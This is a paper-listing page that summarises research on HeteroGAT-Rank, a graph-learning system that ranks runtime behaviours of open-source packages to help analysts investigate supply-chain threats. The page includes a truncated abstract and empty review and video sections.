Operational Runtime Behavior Mining for Open-Source Supply Chain Security
Zhuoran Tan, Ke Xiao, Jeremy Singer, Christos Anagnostopoulos
TL;DR
HeteroGAT-Rank is a runtime behavior mining system that models open-source software execution as heterogeneous graphs, helping security analysts identify relevant threat indicators efficiently at scale.
Contribution
The paper introduces HeteroGAT-Rank, a novel system that uses attention-based graph learning on execution behaviors to support manual security investigations in open-source supply chains.
Findings
Effectively highlights meaningful behavioral indicators.
Supports scalable analysis across multiple ecosystems.
Aligns with real-world vulnerability and attack trends.
Abstract
Open-source software (OSS) is a critical component of modern software systems, yet supply chain security remains challenging in practice due to unavailable or obfuscated source code. Consequently, security teams often rely on runtime observations collected from sandboxed executions to investigate suspicious third-party components. We present HeteroGAT-Rank, an industry-oriented runtime behavior mining system that supports analyst-in-the-loop supply chain threat investigation. The system models execution-time behaviors of OSS packages as lightweight heterogeneous graphs and applies attention-based graph learning to rank behavioral patterns that are most relevant for security analysis. Rather than aiming for fully automated detection, HeteroGAT-Rank surfaces actionable runtime signals - such as file, network, and command activities - to guide manual investigation and threat hunting. To…
Peer Reviews
No public reviews on file for this paper yet. If you reviewed it on a platform where reviews are public (OpenReview, ICLR, NeurIPS, ICML), you can paste yours below so the community can read it here.
Videos
No videos yet. Explain this paper in a talk, walkthrough, or lecture? Add one.
Taxonomy
TopicsInformation and Cyber Security · Advanced Malware Detection Techniques · Software Engineering Research